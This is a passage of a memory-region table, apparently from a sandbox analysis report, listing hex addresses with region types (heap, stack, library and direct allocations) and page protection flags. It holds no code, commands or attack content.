page read and write
|
||
22C4E99E000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
4A9E8FC000
|
stack
|
page read and write
|
||
1C68B72E000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
9BCAFE000
|
stack
|
page read and write
|
||
2244CCCF000
|
heap
|
page read and write
|
||
AA0000
|
heap
|
page read and write
|
||
24AB1035000
|
trusted library allocation
|
page read and write
|
||
294E80B0000
|
direct allocation
|
page read and write
|
||
2244CD22000
|
heap
|
page read and write
|
||
7FF817EC0000
|
trusted library allocation
|
page read and write
|
||
7FF8181E0000
|
trusted library allocation
|
page read and write
|
||
24AB116A000
|
trusted library allocation
|
page read and write
|
||
22C4F727000
|
heap
|
page read and write
|
||
24AC5694000
|
trusted library allocation
|
page read and write
|
||
7FF818140000
|
trusted library allocation
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
22C4ED97000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
1C68B840000
|
heap
|
page read and write
|
||
7FF818056000
|
trusted library allocation
|
page read and write
|
||
1DEADD30000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
3EF8000
|
trusted library allocation
|
page read and write
|
||
294E52B9000
|
heap
|
page read and write
|
||
24AAD1F1000
|
trusted library allocation
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
19C87EF0000
|
heap
|
page read and write
|
||
294E5345000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
9CD000
|
heap
|
page read and write
|
||
37DF000
|
stack
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2244CD08000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
1DEADE30000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
733000
|
heap
|
page read and write
|
||
5E2287E000
|
stack
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
24ABD674000
|
trusted library allocation
|
page read and write
|
||
22C51AAC000
|
heap
|
page read and write
|
||
294E6BD0000
|
direct allocation
|
page read and write
|
||
3FEC000
|
trusted library allocation
|
page read and write
|
||
AFD000
|
unkown
|
page readonly
|
||
954000
|
heap
|
page read and write
|
||
2244CD4F000
|
heap
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
22C4F762000
|
heap
|
page read and write
|
||
294E531A000
|
heap
|
page read and write
|
||
103E000
|
stack
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4EDA6000
|
trusted library allocation
|
page read and write
|
||
2244CD59000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
6BC000
|
heap
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AAD1E0000
|
heap
|
page execute and read and write
|
||
954000
|
heap
|
page read and write
|
||
24ABE4D6000
|
trusted library allocation
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
24AAE7F2000
|
trusted library allocation
|
page read and write
|
||
294E5260000
|
heap
|
page read and write
|
||
24AC56F4000
|
trusted library allocation
|
page read and write
|
||
7FF817F66000
|
trusted library allocation
|
page read and write
|
||
294E6C10000
|
heap
|
page read and write
|
||
7FF818240000
|
trusted library allocation
|
page read and write
|
||
294E6BD3000
|
direct allocation
|
page read and write
|
||
24AC5847000
|
heap
|
page read and write
|
||
24ABE2D6000
|
trusted library allocation
|
page read and write
|
||
24AC573A000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
1C68B6ED000
|
heap
|
page read and write
|
||
2244CD7C000
|
heap
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
485000
|
heap
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
24AB112D000
|
trusted library allocation
|
page read and write
|
||
24AB0FC5000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
294E6BED000
|
direct allocation
|
page read and write
|
||
24AC5990000
|
trusted library allocation
|
page read and write
|
||
22C51AAB000
|
heap
|
page read and write
|
||
24AB06FE000
|
trusted library allocation
|
page read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
1C68B74F000
|
heap
|
page read and write
|
||
84D000
|
stack
|
page read and write
|
||
2FBF000
|
stack
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
22C4F743000
|
heap
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
1C68B70B000
|
heap
|
page read and write
|
||
2F88000
|
trusted library allocation
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
7FF817F60000
|
trusted library allocation
|
page read and write
|
||
9C5000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
24AB114A000
|
trusted library allocation
|
page read and write
|
||
1C68B6D6000
|
heap
|
page read and write
|
||
1DEADEE0000
|
trusted library allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
7FF818180000
|
trusted library allocation
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
2244CD34000
|
heap
|
page read and write
|
||
5E22A7D000
|
stack
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
4A9E3FE000
|
stack
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
22C4EDE4000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
294E8050000
|
direct allocation
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24ABE52A000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
740000
|
trusted library allocation
|
page read and write
|
||
24AC5694000
|
trusted library allocation
|
page read and write
|
||
2E10000
|
heap
|
page read and write
|
||
3FD7000
|
trusted library allocation
|
page read and write
|
||
294E52DC000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
4A9E2FD000
|
stack
|
page read and write
|
||
2244CD4D000
|
heap
|
page read and write
|
||
294E52A2000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
7FF817EB0000
|
trusted library allocation
|
page read and write
|
||
80E000
|
stack
|
page read and write
|
||
2244CD4B000
|
heap
|
page read and write
|
||
22C4ED97000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
2244CD53000
|
heap
|
page read and write
|
||
7FF8180E0000
|
trusted library allocation
|
page read and write
|
||
9D4000
|
heap
|
page read and write
|
||
7FF8180E9000
|
trusted library allocation
|
page read and write
|
||
2244CD73000
|
heap
|
page read and write
|
||
7FF818200000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
7FF818130000
|
trusted library allocation
|
page read and write
|
||
24AC5990000
|
trusted library allocation
|
page read and write
|
||
2244CD61000
|
heap
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
294E80BF000
|
direct allocation
|
page read and write
|
||
24AAB7D0000
|
heap
|
page read and write
|
||
3A25000
|
trusted library allocation
|
page read and write
|
||
1C68B5A0000
|
remote allocation
|
page read and write
|
||
19C87D90000
|
heap
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
24AC5ACF000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24ABE04A000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
24AC56F1000
|
trusted library allocation
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
24AB0F69000
|
trusted library allocation
|
page read and write
|
||
24AB102C000
|
trusted library allocation
|
page read and write
|
||
24AC5697000
|
trusted library allocation
|
page read and write
|
||
24AC5731000
|
trusted library allocation
|
page read and write
|
||
2244CCEA000
|
heap
|
page read and write
|
||
2244CD73000
|
heap
|
page read and write
|
||
24ABD9FA000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
3899000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
5E22FBF000
|
stack
|
page read and write
|
||
24AB113E000
|
trusted library allocation
|
page read and write
|
||
7FF817F6C000
|
trusted library allocation
|
page execute and read and write
|
||
24AB0FAB000
|
trusted library allocation
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
24AC5699000
|
trusted library allocation
|
page read and write
|
||
7DF444640000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8181D0000
|
trusted library allocation
|
page read and write
|
||
24AAFBF2000
|
trusted library allocation
|
page read and write
|
||
24AC5733000
|
trusted library allocation
|
page read and write
|
||
24AC5750000
|
heap
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
294E5320000
|
heap
|
page read and write
|
||
2D5F000
|
stack
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
300000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
24ABE522000
|
trusted library allocation
|
page read and write
|
||
2244CD4F000
|
heap
|
page read and write
|
||
AF0000
|
unkown
|
page readonly
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
22C51AE6000
|
heap
|
page read and write
|
||
2244CCF3000
|
heap
|
page read and write
|
||
294E5240000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
22C4F707000
|
heap
|
page read and write
|
||
294E533E000
|
heap
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
24ABDB6A000
|
trusted library allocation
|
page read and write
|
||
1C68B6F9000
|
heap
|
page read and write
|
||
1C68E51F000
|
direct allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
294E80BF000
|
direct allocation
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4EDA0000
|
trusted library allocation
|
page read and write
|
||
1C68B740000
|
heap
|
page read and write
|
||
1C68E4F0000
|
direct allocation
|
page read and write
|
||
24AACFED000
|
heap
|
page read and write
|
||
2244CD39000
|
heap
|
page read and write
|
||
2244CD7D000
|
heap
|
page read and write
|
||
294E52F1000
|
heap
|
page read and write
|
||
1DEADD7D000
|
heap
|
page read and write
|
||
22C51AE6000
|
heap
|
page read and write
|
||
1C68D03F000
|
direct allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4E980000
|
heap
|
page read and write
|
||
294E52B6000
|
heap
|
page read and write
|
||
22C51ACF000
|
heap
|
page read and write
|
||
294E6C50000
|
direct allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
6DB000
|
heap
|
page read and write
|
||
2244D020000
|
heap
|
page read and write
|
||
7FF8180C0000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
24AC578E000
|
heap
|
page read and write
|
||
1C68D040000
|
direct allocation
|
page read and write
|
||
5E2297E000
|
stack
|
page read and write
|
||
9B6000
|
heap
|
page read and write
|
||
24AC5720000
|
trusted library allocation
|
page read and write
|
||
22C4EDA2000
|
trusted library allocation
|
page read and write
|
||
24AC572C000
|
direct allocation
|
page execute and read and write
|
||
22C51AD2000
|
heap
|
page read and write
|
||
24AC5970000
|
trusted library allocation
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
2244CD73000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
1429000
|
heap
|
page read and write
|
||
46C000
|
unclassified section
|
page readonly
|
||
24AB04C4000
|
trusted library allocation
|
page read and write
|
||
2AEF000
|
stack
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
3FDE000
|
trusted library allocation
|
page read and write
|
||
1C68D020000
|
direct allocation
|
page read and write
|
||
24AACFDF000
|
heap
|
page read and write
|
||
24AACFED000
|
heap
|
page read and write
|
||
24AAB460000
|
heap
|
page read and write
|
||
7FF818190000
|
trusted library allocation
|
page read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
46A000
|
unclassified section
|
page read and write
|
||
294E5338000
|
heap
|
page read and write
|
||
22C51AA5000
|
heap
|
page read and write
|
||
7FF8181C0000
|
trusted library allocation
|
page read and write
|
||
294E6BF0000
|
direct allocation
|
page read and write
|
||
AF1000
|
unkown
|
page execute read
|
||
24AC56F2000
|
trusted library allocation
|
page read and write
|
||
9DE000
|
heap
|
page read and write
|
||
22C4EDB5000
|
trusted library allocation
|
page read and write
|
||
2244CCEA000
|
heap
|
page read and write
|
||
22C4EDB0000
|
trusted library allocation
|
page read and write
|
||
1C68B540000
|
heap
|
page read and write
|
||
7FF8180B0000
|
trusted library allocation
|
page read and write
|
||
107D000
|
stack
|
page read and write
|
||
1C68D027000
|
direct allocation
|
page read and write
|
||
2244CD4D000
|
heap
|
page read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
24AACFF0000
|
heap
|
page read and write
|
||
1C68B71B000
|
heap
|
page read and write
|
||
22C4F708000
|
heap
|
page read and write
|
||
1C68B6F9000
|
heap
|
page read and write
|
||
404000
|
unkown
|
page read and write
|
||
18028CC0000
|
heap
|
page read and write
|
||
22C4F741000
|
heap
|
page read and write
|
||
461000
|
unclassified section
|
page execute read
|
||
22C4F760000
|
heap
|
page read and write
|
||
24ABE2FA000
|
trusted library allocation
|
page read and write
|
||
9E1000
|
heap
|
page read and write
|
||
24AACFE2000
|
heap
|
page read and write
|
||
193B5F7000
|
stack
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
22C51AA6000
|
heap
|
page read and write
|
||
24ABE30A000
|
trusted library allocation
|
page read and write
|
||
294E52F1000
|
heap
|
page read and write
|
||
24AC59D0000
|
heap
|
page read and write
|
||
1C68B730000
|
heap
|
page read and write
|
||
24AACFE1000
|
heap
|
page read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
2244CBC0000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
294E52B9000
|
heap
|
page read and write
|
||
1DEADD81000
|
heap
|
page read and write
|
||
1C68B736000
|
heap
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
24ABE342000
|
trusted library allocation
|
page read and write
|
||
9D4000
|
heap
|
page read and write
|
||
24ABD459000
|
trusted library allocation
|
page read and write
|
||
7FF818120000
|
trusted library allocation
|
page read and write
|
||
24AC5691000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
2244CD16000
|
heap
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
5E22EBE000
|
stack
|
page read and write
|
||
22C4ED95000
|
trusted library allocation
|
page read and write
|
||
22C51AA0000
|
heap
|
page read and write
|
||
B0AE7FF000
|
stack
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
22C4ED97000
|
trusted library allocation
|
page read and write
|
||
2EBE000
|
stack
|
page read and write
|
||
38B2000
|
trusted library allocation
|
page read and write
|
||
9C4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1C68E502000
|
direct allocation
|
page read and write
|
||
22C51AD6000
|
heap
|
page read and write
|
||
2244CD34000
|
heap
|
page read and write
|
||
36DE000
|
stack
|
page read and write
|
||
90D000
|
stack
|
page read and write
|
||
1C68B6DE000
|
heap
|
page read and write
|
||
2244CD59000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
24AC56FD000
|
trusted library allocation
|
page read and write
|
||
22C51AD6000
|
heap
|
page read and write
|
||
94C000
|
heap
|
page read and write
|
||
B02000
|
unkown
|
page readonly
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
24ABD24C000
|
trusted library allocation
|
page read and write
|
||
3FC7000
|
trusted library allocation
|
page read and write
|
||
7FF818092000
|
trusted library allocation
|
page read and write
|
||
294E5341000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
79F67FF000
|
stack
|
page read and write
|
||
B02000
|
unkown
|
page readonly
|
||
952000
|
heap
|
page read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
24AC578E000
|
heap
|
page read and write
|
||
22C4E999000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
2244CCF3000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
24AAB4AC000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
9C3000
|
heap
|
page read and write
|
||
294E530F000
|
heap
|
page read and write
|
||
24AC5720000
|
trusted library allocation
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
22C51BE0000
|
trusted library allocation
|
page execute
|
||
4A9EE4B000
|
stack
|
page read and write
|
||
7FF8181B0000
|
trusted library allocation
|
page read and write
|
||
2244CD39000
|
heap
|
page read and write
|
||
22C51AAC000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
346C000
|
stack
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
24AC5705000
|
trusted library allocation
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
294E6CB0000
|
heap
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
7FF817F70000
|
trusted library allocation
|
page execute and read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AB0D52000
|
trusted library allocation
|
page read and write
|
||
1C68B726000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
24ABDBDA000
|
trusted library allocation
|
page read and write
|
||
24AACEF0000
|
heap
|
page read and write
|
||
22C4ED9E000
|
trusted library allocation
|
page read and write
|
||
79F677A000
|
stack
|
page read and write
|
||
395D000
|
trusted library allocation
|
page read and write
|
||
1C68B72B000
|
heap
|
page read and write
|
||
24AB0FBC000
|
trusted library allocation
|
page read and write
|
||
24AC5980000
|
trusted library allocation
|
page read and write
|
||
24ABDBB2000
|
trusted library allocation
|
page read and write
|
||
2244CCB9000
|
heap
|
page read and write
|
||
24ABE2B2000
|
trusted library allocation
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
2244CD4D000
|
heap
|
page read and write
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
733000
|
heap
|
page read and write
|
||
5E22AFE000
|
stack
|
page read and write
|
||
2244CD3E000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
294E52CC000
|
heap
|
page read and write
|
||
294E533E000
|
heap
|
page read and write
|
||
22C4F741000
|
heap
|
page read and write
|
||
19C87F8B000
|
heap
|
page read and write
|
||
2244CD73000
|
heap
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
5E228FE000
|
stack
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
396B000
|
trusted library allocation
|
page read and write
|
||
BAF000
|
stack
|
page read and write
|
||
24AC56A7000
|
heap
|
page execute and read and write
|
||
24AB0FA1000
|
trusted library allocation
|
page read and write
|
||
1DEADD81000
|
heap
|
page read and write
|
||
24AB1136000
|
trusted library allocation
|
page read and write
|
||
24AC5832000
|
heap
|
page read and write
|
||
24AC56F3000
|
trusted library allocation
|
page read and write
|
||
24ABDF8A000
|
trusted library allocation
|
page read and write
|
||
5E22E38000
|
stack
|
page read and write
|
||
1C68B74F000
|
heap
|
page read and write
|
||
1DEADCA0000
|
heap
|
page read and write
|
||
24AC56F9000
|
trusted library allocation
|
page read and write
|
||
24ABD200000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24ABE4FA000
|
trusted library allocation
|
page read and write
|
||
22C51ABC000
|
heap
|
page read and write
|
||
1C68B6E4000
|
heap
|
page read and write
|
||
24AC5700000
|
trusted library allocation
|
page read and write
|
||
1DEADD38000
|
heap
|
page read and write
|
||
24AC5960000
|
trusted library allocation
|
page read and write
|
||
22C4F75A000
|
heap
|
page read and write
|
||
2E30000
|
trusted library section
|
page readonly
|
||
7FF818147000
|
trusted library allocation
|
page read and write
|
||
24AC56FB000
|
trusted library allocation
|
page read and write
|
||
24AC5730000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
24AC5970000
|
trusted library allocation
|
page read and write
|
||
22C51AD2000
|
heap
|
page read and write
|
||
1C68E500000
|
direct allocation
|
page read and write
|
||
2244CD22000
|
heap
|
page read and write
|
||
64A000
|
heap
|
page read and write
|
||
7FF818061000
|
trusted library allocation
|
page read and write
|
||
24AAB3D0000
|
heap
|
page read and write
|
||
2244CC40000
|
heap
|
page read and write
|
||
24AAB50F000
|
heap
|
page read and write
|
||
24ABE69A000
|
trusted library allocation
|
page read and write
|
||
2244CD51000
|
heap
|
page read and write
|
||
7FF8181F0000
|
trusted library allocation
|
page read and write
|
||
87C000
|
trusted library allocation
|
page read and write
|
||
1C68E51F000
|
direct allocation
|
page read and write
|
||
6B3000
|
heap
|
page read and write
|
||
2244CCCA000
|
heap
|
page read and write
|
||
2244CCFD000
|
heap
|
page read and write
|
||
2244CD46000
|
heap
|
page read and write
|
||
24AACFDF000
|
heap
|
page read and write
|
||
1DEADCC0000
|
heap
|
page read and write
|
||
37EE000
|
trusted library allocation
|
page read and write
|
||
22C4EDA5000
|
trusted library allocation
|
page read and write
|
||
24ABE6BE000
|
trusted library allocation
|
page read and write
|
||
FA8000
|
heap
|
page read and write
|
||
22C51AA7000
|
heap
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library section
|
page read and write
|
||
24AC56B0000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
24ABDF6A000
|
trusted library allocation
|
page read and write
|
||
2244CD61000
|
heap
|
page read and write
|
||
94F000
|
heap
|
page read and write
|
||
294E6C70000
|
direct allocation
|
page read and write
|
||
294E80A0000
|
direct allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC56B0000
|
trusted library allocation
|
page read and write
|
||
294E52D5000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
24AC56F0000
|
trusted library allocation
|
page read and write
|
||
36C000
|
stack
|
page read and write
|
||
1C68D100000
|
direct allocation
|
page read and write
|
||
1C68B730000
|
heap
|
page read and write
|
||
24AAB4E2000
|
heap
|
page read and write
|
||
9D8000
|
heap
|
page read and write
|
||
7FF818080000
|
trusted library allocation
|
page execute and read and write
|
||
9CD000
|
heap
|
page read and write
|
||
5E22B7E000
|
stack
|
page read and write
|
||
24AC5720000
|
trusted library allocation
|
page read and write
|
||
294E53D0000
|
direct allocation
|
page read and write
|
||
955000
|
heap
|
page read and write
|
||
AF1000
|
unkown
|
page execute read
|
||
22C51AA8000
|
heap
|
page read and write
|
||
325F000
|
stack
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
3FEC000
|
trusted library allocation
|
page read and write
|
||
3A33000
|
trusted library allocation
|
page read and write
|
||
24AAB340000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
2244CD4F000
|
heap
|
page read and write
|
||
6BC000
|
heap
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
18029010000
|
heap
|
page read and write
|
||
24AC5980000
|
trusted library allocation
|
page read and write
|
||
22C51ACD000
|
heap
|
page read and write
|
||
2244CBE0000
|
heap
|
page read and write
|
||
24ABD662000
|
trusted library allocation
|
page read and write
|
||
1C68B6E1000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
294E52E1000
|
heap
|
page read and write
|
||
7FF8181A0000
|
trusted library allocation
|
page read and write
|
||
2244CCDB000
|
heap
|
page read and write
|
||
733000
|
heap
|
page read and write
|
||
28EB000
|
stack
|
page read and write
|
||
24AB0F7E000
|
trusted library allocation
|
page read and write
|
||
487000
|
heap
|
page read and write
|
||
952000
|
heap
|
page read and write
|
||
2244CD61000
|
heap
|
page read and write
|
||
24ABE712000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
22C4F751000
|
heap
|
page read and write
|
||
24AC5CCD000
|
unkown
|
page read and write
|
||
2244CD59000
|
heap
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
2244CCB9000
|
heap
|
page read and write
|
||
AFD000
|
unkown
|
page readonly
|
||
24AC56D0000
|
trusted library allocation
|
page read and write
|
||
24AB1152000
|
trusted library allocation
|
page read and write
|
||
A7E000
|
stack
|
page read and write
|
||
24AC5720000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
heap
|
page read and write
|
||
1DEADD84000
|
heap
|
page read and write
|
||
24AAB3B0000
|
heap
|
page read and write
|
||
951000
|
heap
|
page read and write
|
||
19C87ED0000
|
heap
|
page read and write
|
||
2244D02E000
|
heap
|
page read and write
|
||
22C51AD1000
|
heap
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
24AACF76000
|
heap
|
page read and write
|
||
294E52E6000
|
heap
|
page read and write
|
||
22C4EDC5000
|
trusted library allocation
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
24AC5950000
|
trusted library allocation
|
page read and write
|
||
24AC5530000
|
trusted library allocation
|
page read and write
|
||
24ABD4C6000
|
trusted library allocation
|
page read and write
|
||
99D000
|
heap
|
page read and write
|
||
24ABE4B2000
|
trusted library allocation
|
page read and write
|
||
24ABDFCA000
|
trusted library allocation
|
page read and write
|
||
1C68D0E0000
|
direct allocation
|
page read and write
|
||
2244CCCF000
|
heap
|
page read and write
|
||
335A000
|
stack
|
page read and write
|
||
294E52FD000
|
heap
|
page read and write
|
||
3FEB000
|
trusted library allocation
|
page read and write
|
||
24AC5690000
|
trusted library allocation
|
page read and write
|
||
294E52D2000
|
heap
|
page read and write
|
||
2244CD7A000
|
heap
|
page read and write
|
||
24AC5727000
|
direct allocation
|
page execute and read and write
|
||
24AACEE0000
|
heap
|
page read and write
|
||
954000
|
heap
|
page read and write
|
||
22C4F75F000
|
heap
|
page read and write
|
||
24AC56F4000
|
trusted library allocation
|
page read and write
|
||
7FF818210000
|
trusted library allocation
|
page read and write
|
||
9E2000
|
heap
|
page read and write
|
||
18028CA0000
|
heap
|
page read and write
|
||
1DEADB70000
|
trusted library allocation
|
page read and write
|
||
24AC5710000
|
trusted library allocation
|
page read and write
|
||
22C51AE6000
|
heap
|
page read and write
|
||
22C51ABF000
|
heap
|
page read and write
|
||
22C51AB9000
|
heap
|
page read and write
|
||
22C4EDA7000
|
trusted library allocation
|
page read and write
|
||
2244CD51000
|
heap
|
page read and write
|
||
24AACF6B000
|
heap
|
page read and write
|
||
24AAB7D5000
|
heap
|
page read and write
|
||
9D2000
|
heap
|
page read and write
|
||
2244CD7D000
|
heap
|
page read and write
|
||
24AC56E0000
|
trusted library allocation
|
page read and write
|
||
22C4EDA4000
|
trusted library allocation
|
page read and write
|
||
610000
|
heap
|
page read and write
|
||
22C51AC3000
|
heap
|
page read and write
|
||
2244CD34000
|
heap
|
page read and write
|
||
22C4F6F0000
|
heap
|
page read and write
|
||
2244CD46000
|
heap
|
page read and write
|
||
22C4F762000
|
heap
|
page read and write
|
||
22C4F75B000
|
heap
|
page read and write
|
||
2244CC44000
|
heap
|
page read and write
|
||
336D000
|
